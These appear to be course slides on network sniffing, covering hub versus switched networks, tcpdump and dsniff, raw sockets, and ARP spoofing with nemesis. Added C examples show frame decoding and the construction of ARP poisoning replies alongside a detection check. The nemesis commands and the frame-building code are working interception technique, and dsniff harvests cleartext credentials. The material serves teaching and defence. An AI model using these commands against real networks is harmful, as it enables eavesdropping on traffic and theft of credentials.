0x440 Network Sniffing
Outline
Network Sniffing
Sniffing Tools
ARP Spoofing
What is Network Sniffing?
Sniffing is the act of capturing packets on a network that are not addressed to the capturing host and were never meant for public viewing. Whether a host can see such packets depends on how the network delivers frames, which is why the two cases below (hub vs. switch) need different techniques.
Two Sniffing Flows, Depending on the Network
Non-switched network environment: set the NIC to promiscuous mode, then capture packets.
Switched network environment: redirect the victim's traffic to the sniffing host with ARP spoofing, then capture packets.
Non-switched vs. Switched Network
The flow of traffic in a non-switched (hub-based) network
Step 1: Node A transmits a frame to Node C.
Step 2: The hub repeats the frame out of every active port, so every attached node receives a copy.
Step 3: Node B receives the frame and examines the destination address. After determining that it is not the intended host, it discards the frame (unless its NIC is in promiscuous mode, in which case the frame is passed up to the sniffer).
Step 4: Node C receives the frame and examines the destination address. After determining that it is the intended host, it processes the frame further.
Note that steps 3 and 4 can occur in either order.
Non-switched vs. Switched Network
The flow of traffic in a switched network
Step 1: Node A transmits a frame to Node C.
Step 2: The switch examines the destination MAC address of the frame and looks it up in its MAC (CAM) table to find the port Node C is attached to. It then forwards the frame only out of that port, so Node A and Node C effectively have a 'private' connection and Node B never sees the frame, even with its NIC in promiscuous mode. (If the destination MAC is not yet in the table, the switch floods the frame to all ports, behaving like a hub until it learns the address.)
Step 3: Node C receives the frame and examines the destination address. After determining that it is the intended host, it processes the frame further.
Sniffing a Non-switched Network
For a host to be used as a sniffing agent, its NIC must be set to promiscuous mode. Once promiscuous mode is set, the NIC no longer drops frames addressed to other hosts; every frame it sees on the wire is passed up to the operating system, where a packet-capture tool can read it.
Sniffing a Non-switched Network
Setting promiscuous mode on the interface (requires root):
$ sudo ifconfig eth0 promisc
libpcap-based tools such as tcpdump put the interface into promiscuous mode themselves while they run, so this step is only needed for sniffers that read from a raw socket directly.
Packet Capturing Tools
Sniffers: tcpdump, dsniff
Raw socket sniffers: raw_tcpsniff, pcap_sniff (with libpcap), decode_sniff (with libpcap)
Sniffer: tcpdump
$ sudo tcpdump -X 'ip host <victim IP>'
-X prints each captured packet in hex and ASCII; the quoted expression is a BPF filter that restricts the capture to packets sent to or from the victim's IP address.
Sniffer: dsniff
$ sudo dsniff -n
dsniff passively watches for cleartext credentials in protocols such as FTP, Telnet, HTTP and POP and prints them; -n disables DNS resolution so that the output shows raw IP addresses.
Raw Socket
A raw socket is a network socket that allows direct sending and receiving of IP packets without any protocol-specific transport-layer formatting: the application sees the packet headers instead of just a byte stream or datagram payload. A raw socket is created by specifying SOCK_RAW as the socket type. There are multiple protocol options, for example IPPROTO_TCP, IPPROTO_UDP and IPPROTO_ICMP, which select which IP protocol's packets the socket receives. On Linux, creating a raw socket requires root (or the CAP_NET_RAW capability), and packets read from an IPv4 raw socket include the IP header, so the sniffer must parse the headers itself.
Raw Socket Sniffer: raw_tcpsniff
raw_tcpsniff.c
$ gcc -o raw_tcpsniff raw_tcpsniff.c
$ sudo ./raw_tcpsniff
Raw Socket Sniffer with Libpcap: pcap_sniff
pcap_sniff.c
$ gcc -o pcap_sniff pcap_sniff.c -lpcap
$ sudo ./pcap_sniff
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
$ gcc -o decode_sniff decode_sniff.c -lpcap
$ sudo ./decode_sniff
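The raw socket and decode_sniff slides above both boil down to the same task: a buffer arrives from a raw socket or a libpcap callback and the sniffer has to pick the Ethernet, IP and TCP headers out of it. The following is an added example, not the course's decode_sniff.c, showing that decoding with the bounds checks a naive sniffer skips (truncated captures, non-TCP traffic). The struct pkt_summary type, the decode_frame function and the sample_frame bytes are assumptions of this example; the sample frame is constructed by hand and reuses the slides' MAC addresses with made-up IP addresses.

```c
/* Added example (not the course's decode_sniff.c): decode an Ethernet/IPv4/TCP
 * frame as read from a raw socket or handed to a pcap callback, with the header
 * bounds checks a naive sniffer skips. The sample frame below is constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct pkt_summary {
    uint8_t  src_mac[6], dst_mac[6];
    uint32_t src_ip, dst_ip;            /* host byte order */
    uint16_t src_port, dst_port;        /* host byte order */
    uint8_t  tcp_flags;
    size_t   payload_off, payload_len;  /* payload offset into the frame, and length */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* Returns 0 and fills *out for a TCP/IPv4 frame whose headers are complete;
 * -1 for anything else (non-IPv4, non-TCP, or headers cut off by a short capture). */
int decode_frame(const uint8_t *buf, size_t len, struct pkt_summary *out)
{
    if (len < 14 || rd16(buf + 12) != 0x0800) return -1;   /* EtherType must be IPv4 */
    const uint8_t *ip = buf + 14;
    size_t avail = len - 14;
    if (avail < 20 || (ip[0] >> 4) != 4) return -1;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;               /* IP header length incl. options */
    size_t ip_len = rd16(ip + 2);                           /* total length claimed by the packet */
    if (ihl < 20 || ihl > avail || ip_len < ihl) return -1;
    if (ip_len > avail) ip_len = avail;                     /* capture shorter than packet: clamp */
    if (ip[9] != 6) return -1;                              /* protocol field: TCP only */
    const uint8_t *tcp = ip + ihl;
    size_t tcp_avail = ip_len - ihl;
    if (tcp_avail < 20) return -1;
    size_t doff = (size_t)(tcp[12] >> 4) * 4;               /* TCP header length incl. options */
    if (doff < 20 || doff > tcp_avail) return -1;

    memcpy(out->dst_mac, buf, 6);
    memcpy(out->src_mac, buf + 6, 6);
    out->src_ip = rd32(ip + 12);
    out->dst_ip = rd32(ip + 16);
    out->src_port = rd16(tcp);
    out->dst_port = rd16(tcp + 2);
    out->tcp_flags = tcp[13];
    out->payload_off = 14 + ihl + doff;
    out->payload_len = tcp_avail - doff;
    return 0;
}

/* Constructed sample: 00:00:00:AA:AA:AA (10.0.0.1:49152) -> 00:00:00:CC:CC:CC (10.0.0.3:80),
 * PSH|ACK carrying "GET / HTTP/1.0\r\n". IP/TCP checksums are left zero (not verified here). */
const uint8_t sample_frame[] = {
    0x00,0x00,0x00,0xcc,0xcc,0xcc, 0x00,0x00,0x00,0xaa,0xaa,0xaa, 0x08,0x00,  /* Ethernet */
    0x45,0x00, 0x00,0x38, 0x00,0x01, 0x40,0x00, 0x40,0x06, 0x00,0x00,        /* IPv4, total len 56 */
    0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x03,                                /* src 10.0.0.1, dst 10.0.0.3 */
    0xc0,0x00, 0x00,0x50, 0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x01,          /* TCP 49152 -> 80, seq, ack */
    0x50,0x18, 0x20,0x00, 0x00,0x00, 0x00,0x00,                              /* doff 5, PSH|ACK, win, csum, urg */
    'G','E','T',' ','/',' ','H','T','T','P','/','1','.','0','\r','\n'
};
const size_t sample_frame_len = sizeof sample_frame;

static void print_mac(const uint8_t m[6]) {
    printf("%02x:%02x:%02x:%02x:%02x:%02x", m[0], m[1], m[2], m[3], m[4], m[5]);
}

int main(void)
{
    struct pkt_summary s;
    if (decode_frame(sample_frame, sample_frame_len, &s) != 0) {
        puts("not a complete TCP/IPv4 frame");
        return 1;
    }
    print_mac(s.src_mac); printf(" -> "); print_mac(s.dst_mac); putchar('\n');
    printf("%u.%u.%u.%u:%u -> %u.%u.%u.%u:%u flags=0x%02x payload=%zu bytes\n",
           s.src_ip >> 24, (s.src_ip >> 16) & 0xff, (s.src_ip >> 8) & 0xff, s.src_ip & 0xff, s.src_port,
           s.dst_ip >> 24, (s.dst_ip >> 16) & 0xff, (s.dst_ip >> 8) & 0xff, s.dst_ip & 0xff, s.dst_port,
           s.tcp_flags, s.payload_len);
    fwrite(sample_frame + s.payload_off, 1, s.payload_len, stdout);  /* the cleartext a sniffer is after */
    return 0;
}
```

In a real sniffer the same decode_frame call sits inside the pcap_loop callback (the buffer is the packet pointer, len is the caplen from the pcap header) or after a read on the raw socket. The clamp on ip_len matters because libpcap's default snapshot length can truncate packets, and casting the buffer straight to header structs, as the simplest sniffers do, then reads past the end of the capture.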
Sniffing Switched Networks
ARP spoofing
One of the basic operations of Ethernet/IP networking revolves around ARP (Address Resolution Protocol) requests and replies. In general, when Node A wants to communicate with Node C on the local network, it broadcasts an ARP request asking which MAC address belongs to C's IP address, and Node C sends an ARP reply containing its MAC address. Even in a switched environment, this initial ARP request is a broadcast. Most ARP implementations also accept replies they never asked for and update their ARP cache with them. It is therefore possible for Node B to craft and send an unsolicited, fake ARP reply to Node A stating that C's IP address is at Node B's MAC address. Node A will unwittingly send its traffic for C to Node B, because the switch forwards by MAC address and B professes to own the one A is looking for. Sending the mirror-image reply to Node C (A's IP at B's MAC) captures the other direction as well; for the victims' connection to keep working while it is sniffed, the attacker must then forward the intercepted traffic between them (a man-in-the-middle position), otherwise the poisoning is noticed as a connectivity failure.
Sniffing Switched Network
ARP spoofing using NEMESIS
Attacker (System B): IP: MAC: 00:00:00:BB:BB:BB
Victim1 (System A): IP: MAC: 00:00:00:AA:AA:AA
Victim2 (System C): IP: MAC: 00:00:00:CC:CC:CC
Attacker (System B) → Victim1 (System A)
$ sudo nemesis arp -v -r -d eth0 -S -D -h 00:00:00:BB:BB:BB -m 00:00:00:AA:AA:AA -H 00:00:00:BB:BB:BB -M 00:00:00:AA:AA:AA
Attacker (System B) → Victim2 (System C)
$ sudo nemesis arp -v -r -d eth0 -S -D -h 00:00:00:BB:BB:BB -m 00:00:00:CC:CC:CC -H 00:00:00:BB:BB:BB -M 00:00:00:CC:CC:CC
Flags: -r builds an ARP reply rather than a request, -d selects the interface, -v is verbose. -S and -D are the ARP sender and target IP addresses: in the first command the sender IP is Victim2's address (the one being impersonated) and the target IP is Victim1's; in the second they are swapped. -h and -m are the ARP sender and target hardware addresses, so the sender MAC is always the attacker's own 00:00:00:BB:BB:BB. -H and -M are the Ethernet source and destination MACs of the frame carrying the reply, which deliver it unicast to the victim.
ARP cache of Victim1 (System A) after the attack: Victim2's IP address is mapped to 00:00:00:BB:BB:BB.
ARP cache of Victim2 (System C) after the attack: Victim1's IP address is mapped to 00:00:00:BB:BB:BB.
Both can be verified on the victims with arp -a; the poisoned entry shows the attacker's MAC against the peer's IP, and the attacker now receives both directions of the A-C traffic.
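The two nemesis commands above are just two ARP reply frames with particular fields filled in. The following is an added example, not part of the slides and not nemesis's code, that builds those frames byte by byte (so the meaning of -S/-D/-h/-m/-H/-M is visible in the layout) and implements the check a victim host or an IDS can apply to an unsolicited reply: compare the advertised MAC with a known IP-to-MAC binding. The MAC addresses are the ones from the slides; the IP addresses 192.168.1.1/.2/.3 for A/B/C, the function names build_arp_reply, poison_victim1, poison_victim2 and arp_reply_conflicts, and the arp_binding type are assumptions of this example.

```c
/* Added example (not the slides' nemesis invocation): construct the unsolicited ARP
 * replies used to poison the victims' caches, and the consistency check that detects
 * them. MACs are from the slides; the IP addresses are assumed for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARP_FRAME_LEN 42   /* 14-byte Ethernet header + 28-byte ARP message */

static const uint8_t mac_a[6] = {0, 0, 0, 0xaa, 0xaa, 0xaa};  /* Victim1 (System A) */
static const uint8_t mac_b[6] = {0, 0, 0, 0xbb, 0xbb, 0xbb};  /* Attacker (System B) */
static const uint8_t mac_c[6] = {0, 0, 0, 0xcc, 0xcc, 0xcc};  /* Victim2 (System C) */
static const uint8_t ip_a[4] = {192, 168, 1, 1};              /* assumed addresses */
static const uint8_t ip_b[4] = {192, 168, 1, 2};
static const uint8_t ip_c[4] = {192, 168, 1, 3};

/* Field mapping to the nemesis flags: eth_src/eth_dst are -H/-M, sender_mac/sender_ip
 * are -h/-S, target_mac/target_ip are -m/-D. Writes 42 bytes and returns that length. */
size_t build_arp_reply(uint8_t out[ARP_FRAME_LEN],
                       const uint8_t eth_src[6], const uint8_t eth_dst[6],
                       const uint8_t sender_mac[6], const uint8_t sender_ip[4],
                       const uint8_t target_mac[6], const uint8_t target_ip[4])
{
    /* htype Ethernet(1), ptype IPv4(0x0800), hlen 6, plen 4, opcode reply(2) */
    static const uint8_t arp_hdr[8] = {0x00, 0x01, 0x08, 0x00, 6, 4, 0x00, 0x02};
    memcpy(out, eth_dst, 6);
    memcpy(out + 6, eth_src, 6);
    out[12] = 0x08; out[13] = 0x06;          /* EtherType ARP */
    memcpy(out + 14, arp_hdr, 8);
    memcpy(out + 22, sender_mac, 6);         /* "this MAC ..."  */
    memcpy(out + 28, sender_ip, 4);          /* "... owns this IP" */
    memcpy(out + 32, target_mac, 6);
    memcpy(out + 38, target_ip, 4);
    return ARP_FRAME_LEN;
}

/* The two replies from the slides: tell A that C's IP lives at B's MAC, and tell C
 * that A's IP lives at B's MAC. Both are unicast to the victim, as -H/-M do. */
size_t poison_victim1(uint8_t out[ARP_FRAME_LEN]) {
    return build_arp_reply(out, mac_b, mac_a, mac_b, ip_c, mac_a, ip_a);
}
size_t poison_victim2(uint8_t out[ARP_FRAME_LEN]) {
    return build_arp_reply(out, mac_b, mac_c, mac_b, ip_a, mac_c, ip_c);
}

/* A static IP-to-MAC binding the receiving host (or an IDS watching the segment) trusts. */
struct arp_binding { uint8_t ip[4]; uint8_t mac[6]; };

/* Returns 1 if frame is an ARP reply advertising a known IP with a MAC that differs
 * from the trusted binding (cache poisoning), 0 if consistent or not an ARP reply,
 * -1 if the frame is too short to be an ARP message. */
int arp_reply_conflicts(const uint8_t *frame, size_t len,
                        const struct arp_binding *known, size_t nknown)
{
    if (len < ARP_FRAME_LEN) return -1;
    if (frame[12] != 0x08 || frame[13] != 0x06) return 0;   /* not ARP */
    if (frame[20] != 0x00 || frame[21] != 0x02) return 0;   /* not a reply */
    for (size_t i = 0; i < nknown; i++)
        if (memcmp(known[i].ip, frame + 28, 4) == 0 && memcmp(known[i].mac, frame + 22, 6) != 0)
            return 1;
    return 0;
}

static void dump(const char *label, const uint8_t *f, size_t n) {
    printf("%s:", label);
    for (size_t i = 0; i < n; i++) printf(" %02x", f[i]);
    putchar('\n');
}

int main(void)
{
    uint8_t f1[ARP_FRAME_LEN], f2[ARP_FRAME_LEN];
    struct arp_binding truth[2];
    memcpy(truth[0].ip, ip_a, 4); memcpy(truth[0].mac, mac_a, 6);
    memcpy(truth[1].ip, ip_c, 4); memcpy(truth[1].mac, mac_c, 6);

    dump("reply to A", f1, poison_victim1(f1));
    dump("reply to C", f2, poison_victim2(f2));
    printf("A's view conflicts with known bindings: %d\n", arp_reply_conflicts(f1, ARP_FRAME_LEN, truth, 2));
    printf("C's view conflicts with known bindings: %d\n", arp_reply_conflicts(f2, ARP_FRAME_LEN, truth, 2));
    (void)ip_b;  /* the attacker's own IP never appears in the poisoning replies */
    return 0;
}
```

Putting the frames on the wire is what nemesis does for you; from C it takes an AF_PACKET raw socket bound to eth0 and root privileges, which this example deliberately leaves out. The check in arp_reply_conflicts is the same logic tools such as arpwatch apply: an ARP reply for an IP you already know, carrying a different MAC, is either a legitimate NIC change or a poisoning attempt, and on a segment with static hosts it is almost always the latter.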
the end